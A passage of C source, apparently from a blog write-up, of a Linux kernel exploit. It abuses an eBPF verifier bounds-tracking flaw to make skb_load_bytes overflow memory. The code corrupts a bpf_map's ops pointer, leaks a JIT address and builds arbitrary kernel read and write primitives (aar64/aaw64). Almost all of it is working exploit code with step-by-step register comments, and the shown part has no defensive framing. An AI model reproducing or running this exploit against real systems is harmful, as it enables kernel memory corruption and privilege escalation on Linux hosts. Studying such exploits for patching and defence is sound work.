      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) & 0xffff;
  printf("ops_containing_ret_offset: 0x%x\n", ops_containing_ret_offset);
  *(uint16_t*)(&buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &map_val);
    // printf("ret: 0x%x, val: 0x%lx\n", ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    write(socks[1], "Hello", 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] jit_addr: 0x%016lx\n", jit_addr);

  get_enter_to_continue("Press enter to exit(cause kernel crash)...");

  return 0;
}

Refernece

Read more →